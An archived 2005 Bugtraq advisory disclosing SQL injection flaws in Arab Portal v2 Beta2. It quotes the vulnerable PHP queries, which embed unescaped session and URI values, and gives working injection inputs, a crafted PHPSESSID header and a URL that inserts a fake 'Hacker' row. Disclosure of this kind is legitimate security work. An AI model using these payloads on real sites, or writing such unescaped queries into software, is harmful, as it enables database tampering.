lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20051211152449.18219.qmail@securityfocus.com>
Date: 11 Dec 2005 15:24:49 -0000
From: stranger-killer@...mail.com
To: bugtraq@...urityfocus.com
Subject: Arab Portal v2 Beta2 SQL Injections


Hi .. This is small bug for Arab Portal System v2 Beta 2

File name :- global.php
Remote:- Yes
Credit :- 

Devil-00 

Messenger :- <devil-00@....cc>
E-Mail :- <stranger-killer@...mail.com>

//--# Devil SQL Injection
/*
This SQL can do when :-
magic_quotes_gpc = Off 
$session_id << Bad Var

Attacking :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5

Edit HTTPHeader [ PHPSESSID ] = SQL Injection
*/
$apt->query("DELETE FROM rafia_online WHERE onlineSID ='$session_id' or timestamp < $timeout");
#--//

//--# Devil SQL Injection
/*
Devil-00 .. devil-00@....cc
This SQL can do when :-
magic_quotes_gpc = Off 

$REQUEST_URI	<< Bad Var
$session_id		<< Bad Var

Attacking URL :-
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&','010','Hacker','0')/*

SQL Well Be

INSERT INTO rafia_online (timestamp,onlineip,
 onlinefile,onlinepage,onlineSID,user_online,useronlineid) VALUES ('1134309930','127.0.0.1','/Arab_Portal_v.2.0_beta_2/link.php',
'/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5','0202020','Hacker','0')/*','6038e5a71794874f0130af05ec05501b','Guest','0')

Onlines :-
	Guest  	&#1610;&#1578;&#1608;&#1575;&#1580;&#1583; &#1601;&#1610;  	---
	Hacker 	&#1610;&#1578;&#1608;&#1575;&#1580;&#1583; &#1601;&#1610; 	---
*/
$apt->query("INSERT INTO rafia_online (timestamp,
                                          onlineip,
                                          onlinefile,
                                          onlinepage,
                                          onlineSID,
                                          user_online,
                                          useronlineid)
                                  VALUES ('$timestamp',
                                          '$online_ip',
                                          '$PHP_SELF',
                                          '$REQUEST_URI', 
                                          '$session_id',
                                          '$useronline',
                                          '$useronlineid')");
#--//


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ